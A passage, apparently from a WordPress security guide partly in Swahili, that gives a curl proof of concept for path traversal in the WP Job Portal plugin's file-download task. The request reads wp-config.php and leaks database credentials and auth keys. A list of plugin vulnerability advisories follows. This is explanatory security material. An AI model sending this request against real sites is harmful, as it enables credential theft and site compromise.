curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'task=downloadcustomfile' \
--data-urlencode '_wpnonce=<nonce>' \
--data-urlencode 'upload_for=resume' \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'

Seva inajibu na yaliyomo ya wp-config.php, leaking DB credentials and auth keys.

Marejeleo

• Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme
• Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin
• Rare Case of Privilege Escalation in ASE Plugin Affecting 100k+ Sites
• ASE 7.6.3 changeset – delete original roles on profile update
• Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses
• WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)
• Hackers exploiting critical WordPress WooCommerce Payments bug
• Unpatched Privilege Escalation in Service Finder Bookings Plugin
• Service Finder Bookings privilege escalation – Patchstack DB entry